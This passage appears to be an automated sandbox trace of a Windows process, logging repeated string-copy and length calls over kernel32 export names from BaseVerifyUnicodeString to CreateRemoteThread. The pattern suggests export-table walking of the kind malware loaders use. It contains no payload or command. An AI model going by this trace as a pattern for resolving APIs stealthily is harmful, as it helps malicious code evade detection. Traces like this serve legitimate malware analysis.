lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.594] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.594] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.594] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.594] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.595] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.595] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.595] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.595] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.595] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.595] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.595] lstrlenA (lpString="BEEP") returned 4 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.595] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.595] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.595] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.595] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.595] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.595] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.595] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.595] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.595] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.595] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.595] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.595] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.595] lstrlenA (lpString="CANCELIO") returned 8 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.596] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.596] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.596] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.596] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.596] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.596] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.596] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.596] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.596] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.596] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.596] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.596] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.596] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.596] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.596] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.596] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.596] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.596] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.597] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.597] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.597] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.597] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.597] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.597] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.597] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.597] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.597] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.597] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.597] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.597] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.597] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.597] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.597] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.597] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.597] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.598] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.598] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.598] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.598] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.598] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.598] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.598] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.598] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.598] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.598] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.598] lstrlenA (lpString="COPYFILEA") returned 9 [0082.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.599] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.599] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.599] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.599] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.599] lstrlenA (lpString="COPYFILEW") returned 9 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.599] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.599] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.599] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.599] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.599] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.599] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.599] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.599] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.599] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.599] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.599] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.599] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.600] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.600] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.600] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.600] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.600] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.600] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.600] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.600] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.600] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.600] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.600] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.600] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.600] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.600] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.600] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.600] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.600] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.600] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.601] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.601] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.601] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.601] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.601] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.601] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.601] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.601] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.601] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.601] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.601] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.601] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.601] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.601] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.601] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.601] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.601] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.601] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.602] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.602] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.602] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.602] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, 